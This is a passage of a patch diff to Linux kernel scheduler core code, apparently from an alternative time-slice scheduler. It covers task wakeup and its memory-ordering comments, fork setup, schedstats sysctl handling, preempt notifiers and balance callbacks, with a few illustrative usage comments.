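-+ *   ttwu_state_match(p, TASK_NORMAL, &success);   // true, success == 1
-+ *   ttwu_state_match(p, TASK_KILLABLE, &success); // also true, masks overlap
-+ */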
-+
-+/*
-+ * Notes on Program-Order guarantees on SMP systems.
-+ *
-+ *  MIGRATION
-+ *
-+ * The basic program-order guarantee on SMP systems is that when a task [t]
-+ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
-+ * execution on its new CPU [c1].
-+ *
-+ * For migration (of runnable tasks) this is provided by the following means:
-+ *
-+ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
-+ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
-+ *     rq(c1)->lock (if not at the same time, then in that order).
-+ *  C) LOCK of the rq(c1)->lock scheduling in task
-+ *
-+ * Transitivity guarantees that B happens after A and C after B.
-+ * Note: we only require RCpc transitivity.
-+ * Note: the CPU doing B need not be c0 or c1
-+ *
-+ * Example:
-+ *
-+ *   CPU0            CPU1            CPU2
-+ *
-+ *   LOCK rq(0)->lock
-+ *   sched-out X
-+ *   sched-in Y
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(0)->lock // orders against CPU0
-+ *                                   dequeue X
-+ *                                   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(1)->lock
-+ *                                   enqueue X
-+ *                                   UNLOCK rq(1)->lock
-+ *
-+ *                   LOCK rq(1)->lock // orders against CPU2
-+ *                   sched-out Z
-+ *                   sched-in X
-+ *                   UNLOCK rq(1)->lock
-+ *
-+ *
-+ *  BLOCKING -- aka. SLEEP + WAKEUP
-+ *
-+ * For blocking we (obviously) need to provide the same guarantee as for
-+ * migration. However the means are completely different as there is no lock
-+ * chain to provide order. Instead we do:
-+ *
-+ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
-+ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
-+ *
-+ * Example:
-+ *
-+ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
-+ *
-+ *   LOCK rq(0)->lock LOCK X->pi_lock
-+ *   dequeue X
-+ *   sched-out X
-+ *   smp_store_release(X->on_cpu, 0);
-+ *
-+ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
-+ *                    X->state = WAKING
-+ *                    set_task_cpu(X,2)
-+ *
-+ *                    LOCK rq(2)->lock
-+ *                    enqueue X
-+ *                    X->state = RUNNING
-+ *                    UNLOCK rq(2)->lock
-+ *
-+ *                                          LOCK rq(2)->lock // orders against CPU1
-+ *                                          sched-out Z
-+ *                                          sched-in X
-+ *                                          UNLOCK rq(2)->lock
-+ *
-+ *                    UNLOCK X->pi_lock
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *
-+ * However, for wakeups there is a second guarantee we must provide, namely we
-+ * must observe the state that led to our wakeup. That is, not only must our
-+ * task observe its own prior state, it must also observe the stores prior to
-+ * its wakeup.
-+ *
-+ * This means that any means of doing remote wakeups must order the CPU doing
-+ * the wakeup against the CPU the task is going to end up running on. This,
-+ * however, is already required for the regular Program-Order guarantee above,
-+ * since the waking CPU is the one issuing the ACQUIRE (smp_cond_load_acquire).
-+ *
-+ */
-+
-+/**
-+ * try_to_wake_up - wake up a thread
-+ * @p: the thread to be awakened
-+ * @state: the mask of task states that can be woken
-+ * @wake_flags: wake modifier flags (WF_*)
-+ *
-+ * Conceptually does:
-+ *
-+ *   If (@state & @p->state) @p->state = TASK_RUNNING.
-+ *
-+ * If the task was not queued/runnable, also place it back on a runqueue.
-+ *
-+ * This function is atomic against schedule() which would dequeue the task.
-+ *
-+ * It issues a full memory barrier before accessing @p->state, see the comment
-+ * with set_current_state().
-+ *
-+ * Uses p->pi_lock to serialize against concurrent wake-ups.
-+ *
-+ * Relies on p->pi_lock stabilizing:
-+ *  - p->sched_class
-+ *  - p->cpus_ptr
-+ *  - p->sched_task_group
-+ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
-+ *
-+ * Tries really hard to only take one task_rq(p)->lock for performance.
-+ * Takes rq->lock in:
-+ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
-+ *  - ttwu_queue()       -- new rq, for enqueue of the task;
-+ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
-+ *
-+ * As a consequence we race really badly with just about everything. See the
-+ * many memory barriers and their comments for details.
-+ *
-+ * Return: %true if @p->state changes (an actual wakeup was done),
-+ *	   %false otherwise.
-+ */
-+static int try_to_wake_up(struct task_struct *p, unsigned int state,
-+			  int wake_flags)
-+{
-+	unsigned long flags;
-+	int cpu, success = 0;
-+
-+	preempt_disable();
-+	if (p == current) {
-+		/*
-+		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
-+		 * == smp_processor_id()'. Together this means we can special
-+		 * case the whole 'p->on_rq && ttwu_runnable()' case below
-+		 * without taking any locks.
-+		 *
-+		 * In particular:
-+		 *  - we rely on Program-Order guarantees for all the ordering,
-+		 *  - we're serialized against set_special_state() by virtue of
-+		 *    it disabling IRQs (this allows not taking ->pi_lock).
-+		 */
-+		if (!ttwu_state_match(p, state, &success))
-+			goto out;
-+
-+		trace_sched_waking(p);
-+		WRITE_ONCE(p->__state, TASK_RUNNING);
-+		trace_sched_wakeup(p);
-+		goto out;
-+	}
-+
-+	/*
-+	 * If we are going to wake up a thread waiting for CONDITION we
-+	 * need to ensure that CONDITION=1 done by the caller can not be
-+	 * reordered with p->state check below. This pairs with smp_store_mb()
-+	 * in set_current_state() that the waiting thread does.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	smp_mb__after_spinlock();
-+	if (!ttwu_state_match(p, state, &success))
-+		goto unlock;
-+
-+	trace_sched_waking(p);
-+
-+	/*
-+	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
-+	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
-+	 * in smp_cond_load_acquire() below.
-+	 *
-+	 * sched_ttwu_pending()			try_to_wake_up()
-+	 *   STORE p->on_rq = 1			  LOAD p->state
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * [task p]
-+	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * A similar smp_rmb() lives in __task_needs_rq_lock().
-+	 */
-+	smp_rmb();
-+	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
-+		goto unlock;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
-+	 * possible to, falsely, observe p->on_cpu == 0.
-+	 *
-+	 * One must be running (->on_cpu == 1) in order to remove oneself
-+	 * from the runqueue.
-+	 *
-+	 * __schedule() (switch to task 'p')	try_to_wake_up()
-+	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (put 'p' to sleep)
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
-+	 * schedule()'s deactivate_task() has 'happened' and p will no longer
-+	 * care about its own p->state. See the comment in __schedule().
-+	 */
-+	smp_acquire__after_ctrl_dep();
-+
-+	/*
-+	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
-+	 * == 0), which means we need to do an enqueue, change p->state to
-+	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
-+	 * enqueue, such as ttwu_queue_wakelist().
-+	 */
-+	WRITE_ONCE(p->__state, TASK_WAKING);
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, consider queueing p on the remote CPU's wake_list
-+	 * which potentially sends an IPI instead of spinning on p->on_cpu to
-+	 * let the waker make forward progress. This is safe because IRQs are
-+	 * disabled and the IPI will deliver after on_cpu is cleared.
-+	 *
-+	 * Ensure we load task_cpu(p) after p->on_cpu:
-+	 *
-+	 * set_task_cpu(p, cpu);
-+	 *   STORE p->cpu = @cpu
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock
-+	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
-+	 *   STORE p->on_cpu = 1                LOAD p->cpu
-+	 *
-+	 * to ensure we observe the correct CPU on which the task is currently
-+	 * scheduling.
-+	 */
-+	if (smp_load_acquire(&p->on_cpu) &&
-+	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
-+		goto unlock;
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, wait until it's done referencing the task.
-+	 *
-+	 * Pairs with the smp_store_release() in finish_task().
-+	 *
-+	 * This ensures that tasks getting woken will be fully ordered against
-+	 * their previous state and preserve Program Order.
-+	 */
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+	sched_task_ttwu(p);
-+
-+	cpu = select_task_rq(p);
-+
-+	if (cpu != task_cpu(p)) {
-+		if (p->in_iowait) {
-+			delayacct_blkio_end(p);
-+			atomic_dec(&task_rq(p)->nr_iowait);
-+		}
-+
-+		wake_flags |= WF_MIGRATED;
-+		psi_ttwu_dequeue(p);
-+		set_task_cpu(p, cpu);
-+	}
-+#else
-+	cpu = task_cpu(p);
-+#endif /* CONFIG_SMP */
-+
-+	ttwu_queue(p, cpu, wake_flags);
-+unlock:
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+out:
-+	if (success)
-+		ttwu_stat(p, task_cpu(p), wake_flags);
-+	preempt_enable();
-+
-+	return success;
-+}
-+
-+static bool __task_needs_rq_lock(struct task_struct *p)
-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
-+	 * the task is blocked. Make sure to check @state since ttwu() can drop
-+	 * locks at the end, see ttwu_queue_wakelist().
-+	 */
-+	if (state == TASK_RUNNING || state == TASK_WAKING)
-+		return true;
-+
-+	/*
-+	 * Ensure we load p->on_rq after p->__state, otherwise it would be
-+	 * possible to, falsely, observe p->on_rq == 0.
-+	 *
-+	 * See try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	if (p->on_rq)
-+		return true;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure the task has finished __schedule() and will not be referenced
-+	 * anymore. Again, see try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+#endif
-+
-+	return false;
-+}
-+
-+/**
-+ * task_call_func - Invoke a function on task in fixed state
-+ * @p: Process for which the function is to be invoked, can be @current.
-+ * @func: Function to invoke.
-+ * @arg: Argument to function.
-+ *
-+ * Fix the task in its current state by avoiding wakeups and/or rq operations
-+ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
-+ * to work out what the state is, if required.  Given that @func can be invoked
-+ * with a runqueue lock held, it had better be quite lightweight.
-+ *
-+ * Returns:
-+ *   Whatever @func returns
-+ */
-+int task_call_func(struct task_struct *p, task_call_f func, void *arg)
-+{
-+	struct rq *rq = NULL;
-+	struct rq_flags rf;
-+	int ret;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
-+
-+	if (__task_needs_rq_lock(p))
-+		rq = __task_rq_lock(p, &rf);
-+
-+	/*
-+	 * At this point the task is pinned; either:
-+	 *  - blocked and we're holding off wakeups      (pi->lock)
-+	 *  - woken, and we're holding off enqueue       (rq->lock)
-+	 *  - queued, and we're holding off schedule     (rq->lock)
-+	 *  - running, and we're holding off de-schedule (rq->lock)
-+	 *
-+	 * The called function (@func) can use: task_curr(), p->on_rq and
-+	 * p->__state to differentiate between these states.
-+	 */
-+	ret = func(p, arg);
-+
-+	if (rq)
-+		__task_rq_unlock(rq, &rf);
-+
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
-+	return ret;
-+}
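-+
-+/*
-+ * Illustrative usage (not part of this patch; read_task_cpu is a
-+ * hypothetical callback): sample a field of @p while its state is pinned
-+ * as described above:
-+ *
-+ *   static int read_task_cpu(struct task_struct *p, void *arg)
-+ *   {
-+ *           *(int *)arg = task_cpu(p);
-+ *           return 0;
-+ *   }
-+ *
-+ *   int cpu;
-+ *   task_call_func(p, read_task_cpu, &cpu);
-+ */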
-+
-+/**
-+ * cpu_curr_snapshot - Return a snapshot of the currently running task
-+ * @cpu: The CPU on which to snapshot the task.
-+ *
-+ * Returns the task_struct pointer of the task "currently" running on
-+ * the specified CPU.  If the same task is running on that CPU throughout,
-+ * the return value will be a pointer to that task's task_struct structure.
-+ * If the CPU did any context switches even vaguely concurrently with the
-+ * execution of this function, the return value will be a pointer to the
-+ * task_struct structure of a randomly chosen task that was running on
-+ * that CPU somewhere around the time that this function was executing.
-+ *
-+ * If the specified CPU was offline, the return value is whatever it
-+ * is, perhaps a pointer to the task_struct structure of that CPU's idle
-+ * task, but there is no guarantee.  Callers wishing a useful return
-+ * value must take some action to ensure that the specified CPU remains
-+ * online throughout.
-+ *
-+ * This function executes full memory barriers before and after fetching
-+ * the pointer, which permits the caller to confine this function's fetch
-+ * with respect to the caller's accesses to other shared variables.
-+ */
-+struct task_struct *cpu_curr_snapshot(int cpu)
-+{
-+	struct task_struct *t;
-+
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	t = rcu_dereference(cpu_curr(cpu));
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	return t;
-+}
-+
-+/**
-+ * wake_up_process - Wake up a specific process
-+ * @p: The process to be woken up.
-+ *
-+ * Attempt to wake up the nominated process and move it to the set of runnable
-+ * processes.
-+ *
-+ * Return: 1 if the process was woken up, 0 if it was already running.
-+ *
-+ * This function executes a full memory barrier before accessing the task state.
-+ */
-+int wake_up_process(struct task_struct *p)
-+{
-+	return try_to_wake_up(p, TASK_NORMAL, 0);
-+}
-+EXPORT_SYMBOL(wake_up_process);
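-+
-+/*
-+ * Illustrative example (not part of this patch; 'condition' and 'sleeper'
-+ * are placeholders): the canonical sleep/wake pairing this API serves:
-+ *
-+ *   // sleeper:
-+ *   for (;;) {
-+ *           set_current_state(TASK_INTERRUPTIBLE);
-+ *           if (READ_ONCE(condition))
-+ *                   break;
-+ *           schedule();
-+ *   }
-+ *   __set_current_state(TASK_RUNNING);
-+ *
-+ *   // waker:
-+ *   WRITE_ONCE(condition, 1);
-+ *   wake_up_process(sleeper);
-+ */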
-+
-+int wake_up_state(struct task_struct *p, unsigned int state)
-+{
-+	return try_to_wake_up(p, state, 0);
-+}
-+
-+/*
-+ * Perform scheduler related setup for a newly forked process p.
-+ * p is forked by current.
-+ *
-+ * __sched_fork() is basic setup used by init_idle() too:
-+ */
-+static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	p->on_rq			= 0;
-+	p->on_cpu			= 0;
-+	p->utime			= 0;
-+	p->stime			= 0;
-+	p->sched_time			= 0;
-+
-+#ifdef CONFIG_SCHEDSTATS
-+	/* Even if schedstat is disabled, there should not be garbage */
-+	memset(&p->stats, 0, sizeof(p->stats));
-+#endif
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+	INIT_HLIST_HEAD(&p->preempt_notifiers);
-+#endif
-+
-+#ifdef CONFIG_COMPACTION
-+	p->capture_control = NULL;
-+#endif
-+#ifdef CONFIG_SMP
-+	p->wake_entry.u_flags = CSD_TYPE_TTWU;
-+#endif
-+}
-+
-+/*
-+ * fork()/clone()-time setup:
-+ */
-+int sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	__sched_fork(clone_flags, p);
-+	/*
-+	 * We mark the process as NEW here. This guarantees that
-+	 * nobody will actually run it, and a signal or other external
-+	 * event cannot wake it up and insert it on the runqueue either.
-+	 */
-+	p->__state = TASK_NEW;
-+
-+	/*
-+	 * Make sure we do not leak PI boosting priority to the child.
-+	 */
-+	p->prio = current->normal_prio;
-+
-+	/*
-+	 * Revert to default priority/policy on fork if requested.
-+	 */
-+	if (unlikely(p->sched_reset_on_fork)) {
-+		if (task_has_rt_policy(p)) {
-+			p->policy = SCHED_NORMAL;
-+			p->static_prio = NICE_TO_PRIO(0);
-+			p->rt_priority = 0;
-+		} else if (PRIO_TO_NICE(p->static_prio) < 0)
-+			p->static_prio = NICE_TO_PRIO(0);
-+
-+		p->prio = p->normal_prio = p->static_prio;
-+
-+		/*
-+		 * We don't need the reset flag anymore after the fork. It has
-+		 * fulfilled its duty:
-+		 */
-+		p->sched_reset_on_fork = 0;
-+	}
-+
-+#ifdef CONFIG_SCHED_INFO
-+	if (unlikely(sched_info_on()))
-+		memset(&p->sched_info, 0, sizeof(p->sched_info));
-+#endif
-+	init_task_preempt_count(p);
-+
-+	return 0;
-+}
-+
-+void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	/*
-+	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
-+	 * required yet, but lockdep gets upset if rules are violated.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	/*
-+	 * Share the timeslice between parent and child, thus the
-+	 * total amount of pending timeslices in the system doesn't change,
-+	 * resulting in more scheduling fairness.
-+	 */
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->curr->time_slice /= 2;
-+	p->time_slice = rq->curr->time_slice;
-+#ifdef CONFIG_SCHED_HRTICK
-+	hrtick_start(rq, rq->curr->time_slice);
-+#endif
-+
-+	if (p->time_slice < RESCHED_NS) {
-+		p->time_slice = sched_timeslice_ns;
-+		resched_curr(rq);
-+	}
-+	sched_task_fork(p, rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rseq_migrate(p);
-+	/*
-+	 * We're setting the CPU for the first time, we don't migrate,
-+	 * so use __set_task_cpu().
-+	 */
-+	__set_task_cpu(p, smp_processor_id());
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
-+void sched_post_fork(struct task_struct *p)
-+{
-+}
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+DEFINE_STATIC_KEY_FALSE(sched_schedstats);
-+
-+static void set_schedstats(bool enabled)
-+{
-+	if (enabled)
-+		static_branch_enable(&sched_schedstats);
-+	else
-+		static_branch_disable(&sched_schedstats);
-+}
-+
-+void force_schedstat_enabled(void)
-+{
-+	if (!schedstat_enabled()) {
-+		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
-+		static_branch_enable(&sched_schedstats);
-+	}
-+}
-+
-+static int __init setup_schedstats(char *str)
-+{
-+	int ret = 0;
-+	if (!str)
-+		goto out;
-+
-+	if (!strcmp(str, "enable")) {
-+		set_schedstats(true);
-+		ret = 1;
-+	} else if (!strcmp(str, "disable")) {
-+		set_schedstats(false);
-+		ret = 1;
-+	}
-+out:
-+	if (!ret)
-+		pr_warn("Unable to parse schedstats=\n");
-+
-+	return ret;
-+}
-+__setup("schedstats=", setup_schedstats);
-+
-+#ifdef CONFIG_PROC_SYSCTL
-+static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
-+		size_t *lenp, loff_t *ppos)
-+{
-+	struct ctl_table t;
-+	int err;
-+	int state = static_branch_likely(&sched_schedstats);
-+
-+	if (write && !capable(CAP_SYS_ADMIN))
-+		return -EPERM;
-+
-+	t = *table;
-+	t.data = &state;
-+	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
-+	if (err < 0)
-+		return err;
-+	if (write)
-+		set_schedstats(state);
-+	return err;
-+}
-+
-+static struct ctl_table sched_core_sysctls[] = {
-+	{
-+		.procname       = "sched_schedstats",
-+		.data           = NULL,
-+		.maxlen         = sizeof(unsigned int),
-+		.mode           = 0644,
-+		.proc_handler   = sysctl_schedstats,
-+		.extra1         = SYSCTL_ZERO,
-+		.extra2         = SYSCTL_ONE,
-+	},
-+	{}
-+};
-+static int __init sched_core_sysctl_init(void)
-+{
-+	register_sysctl_init("kernel", sched_core_sysctls);
-+	return 0;
-+}
-+late_initcall(sched_core_sysctl_init);
-+#endif /* CONFIG_PROC_SYSCTL */
-+#endif /* CONFIG_SCHEDSTATS */
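-+
-+/*
-+ * Illustrative usage (not part of this patch): schedstats can be enabled
-+ * at boot with the "schedstats=enable" kernel parameter handled above, or
-+ * toggled at runtime through the sysctl:
-+ *
-+ *   # sysctl kernel.sched_schedstats=1
-+ */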
-+
-+/*
-+ * wake_up_new_task - wake up a newly created task for the first time.
-+ *
-+ * This function will do some initial scheduler statistics housekeeping
-+ * that must be done for every newly created context, then puts the task
-+ * on the runqueue and wakes it.
-+ */
-+void wake_up_new_task(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	rq = cpu_rq(select_task_rq(p));
-+#ifdef CONFIG_SMP
-+	rseq_migrate(p);
-+	/*
-+	 * Fork balancing, do it here and not earlier because:
-+	 * - cpus_ptr can change in the fork path
-+	 * - any previously selected CPU might disappear through hotplug
-+	 *
-+	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
-+	 * as we're not fully set-up yet.
-+	 */
-+	__set_task_cpu(p, cpu_of(rq));
-+#endif
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	activate_task(p, rq);
-+	trace_sched_wakeup_new(p);
-+	check_preempt_curr(rq);
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+
-+static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
-+
-+void preempt_notifier_inc(void)
-+{
-+	static_branch_inc(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_inc);
-+
-+void preempt_notifier_dec(void)
-+{
-+	static_branch_dec(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_dec);
-+
-+/**
-+ * preempt_notifier_register - tell me when current is being preempted & rescheduled
-+ * @notifier: notifier struct to register
-+ */
-+void preempt_notifier_register(struct preempt_notifier *notifier)
-+{
-+	if (!static_branch_unlikely(&preempt_notifier_key))
-+		WARN(1, "registering preempt_notifier while notifiers disabled\n");
-+
-+	hlist_add_head(&notifier->link, &current->preempt_notifiers);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_register);
-+
-+/**
-+ * preempt_notifier_unregister - no longer interested in preemption notifications
-+ * @notifier: notifier struct to unregister
-+ *
-+ * This is *not* safe to call from within a preemption notifier.
-+ */
-+void preempt_notifier_unregister(struct preempt_notifier *notifier)
-+{
-+	hlist_del(&notifier->link);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
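-+
-+/*
-+ * Illustrative sketch (not part of this patch; my_ops/my_sched_* are
-+ * hypothetical): a user such as a hypervisor wires up callbacks and
-+ * registers them on the current task:
-+ *
-+ *   static void my_sched_in(struct preempt_notifier *notifier, int cpu) { }
-+ *   static void my_sched_out(struct preempt_notifier *notifier,
-+ *                            struct task_struct *next) { }
-+ *   static struct preempt_notifier_ops my_ops = {
-+ *           .sched_in  = my_sched_in,
-+ *           .sched_out = my_sched_out,
-+ *   };
-+ *
-+ *   struct preempt_notifier pn;
-+ *
-+ *   preempt_notifier_inc();
-+ *   preempt_notifier_init(&pn, &my_ops);
-+ *   preempt_notifier_register(&pn);
-+ */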
-+
-+static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_in(notifier, raw_smp_processor_id());
-+}
-+
-+static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_in_preempt_notifiers(curr);
-+}
-+
-+static void
-+__fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				   struct task_struct *next)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_out(notifier, next);
-+}
-+
-+static __always_inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_out_preempt_notifiers(curr, next);
-+}
-+
-+#else /* !CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+}
-+
-+static inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+}
-+
-+#endif /* CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void prepare_task(struct task_struct *next)
-+{
-+	/*
-+	 * Claim the task as running, we do this before switching to it
-+	 * such that any running task will have this set.
-+	 *
-+	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
-+	 * its ordering comment.
-+	 */
-+	WRITE_ONCE(next->on_cpu, 1);
-+}
-+
-+static inline void finish_task(struct task_struct *prev)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * This must be the very last reference to @prev from this CPU. After
-+	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
-+	 * must ensure this doesn't happen until the switch is completely
-+	 * finished.
-+	 *
-+	 * In particular, the load of prev->state in finish_task_switch() must
-+	 * happen before this.
-+	 *
-+	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
-+	 */
-+	smp_store_release(&prev->on_cpu, 0);
-+#else
-+	prev->on_cpu = 0;
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	void (*func)(struct rq *rq);
-+	struct balance_callback *next;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	while (head) {
-+		func = (void (*)(struct rq *))head->func;
-+		next = head->next;
-+		head->next = NULL;
-+		head = next;
-+
-+		func(rq);
-+	}
-+}
-+
-+static void balance_push(struct rq *rq);
-+
-+/*
-+ * balance_push_callback is a right abuse of the callback interface and plays
-+ * by significantly different rules.
-+ *
-+ * Where the normal balance_callback's purpose is to be run in the same context
-+ * that queued it (only later, when it's safe to drop rq->lock again),
-+ * balance_push_callback is specifically targeted at __schedule().
-+ *
-+ * This abuse is tolerated because it places all the unlikely/odd cases behind
-+ * a single test, namely: rq->balance_callback == NULL.
-+ */
-+struct balance_callback balance_push_callback = {
-+	.next = NULL,
-+	.func = balance_push,
-+};
-+
-+static inline struct balance_callback *
-+__splice_balance_callbacks(struct rq *rq, bool split)
-+{
-+	struct balance_callback *head = rq->balance_callback;
-+
-+	if (likely(!head))
-+		return NULL;
-+
-+	lockdep_assert_rq_held(rq);
-+	/*
-+	 * Must not take balance_push_callback off the list when
-+	 * splice_balance_callbacks() and balance_callbacks() are not
-+	 * in the same rq->lock section.
-+	 *
-+	 * In that case it would be possible for __schedule() to interleave
-+	 * and observe the list empty.
-+	 */
-+	if (split && head == &balance_push_callback)
-+		head = NULL;
-+	else
-+		rq->balance_callback = NULL;
-+
-+	return head;
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return __splice_balance_callbacks(rq, true);
-+}
-+
-+static void __balance_callbacks(struct rq *rq)
-+{
-+	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	unsigned long flags;
-+
-+	if (unlikely(head)) {
-+		raw_spin_lock_irqsave(&rq->lock, flags);
-+		do_balance_callbacks(rq, head);
-+		raw_spin_unlock_irqrestore(&rq->lock, flags);
-+	}
-+}
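-+
-+/*
-+ * Illustrative sketch (not part of this patch; my_cb/my_balance_fn are
-+ * hypothetical). A callback is pushed onto rq->balance_callback while
-+ * rq->lock is held, matching the list layout walked by
-+ * do_balance_callbacks() above:
-+ *
-+ *   // with rq->lock held:
-+ *   my_cb.func = my_balance_fn;
-+ *   my_cb.next = rq->balance_callback;
-+ *   rq->balance_callback = &my_cb;
-+ *
-+ * The callback then runs via __balance_callbacks() or balance_callbacks()
-+ * once it is safe to operate on the rq again.
-+ */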
-+
-+#else
-+
-+static inline void __balance_callbacks(struct rq *rq)
-+{
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return NULL;
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+}
-+
-+#endif
-+
-+static inline void
-+prepare_lock_switch(struct rq *rq, struct task_struct *next)
-+{
-+	/*
-+	 * Since the runqueue lock will be released by the next
-+	 * task (which is an invalid locking op but in the case
-+	 * of the scheduler it's an obvious special-case), we
-+	 * do an early lockdep release here:
-+	 */
-+	spin_release(&rq->lock.dep_map, _THIS_IP_);
-+#ifdef CONFIG_DEBUG_SPINLOCK
-+	/* this is a valid case when another task releases the spinlock */
-+	rq->lock.owner = next;
-+#endif
-+}
-+
-+static inline void finish_lock_switch(struct rq *rq)
-+{
-+	/*
-+	 * If we are tracking spinlock dependencies then we have to
-+	 * fix up the runqueue lock - which gets 'carried over' from
-+	 * prev into current:
-+	 */
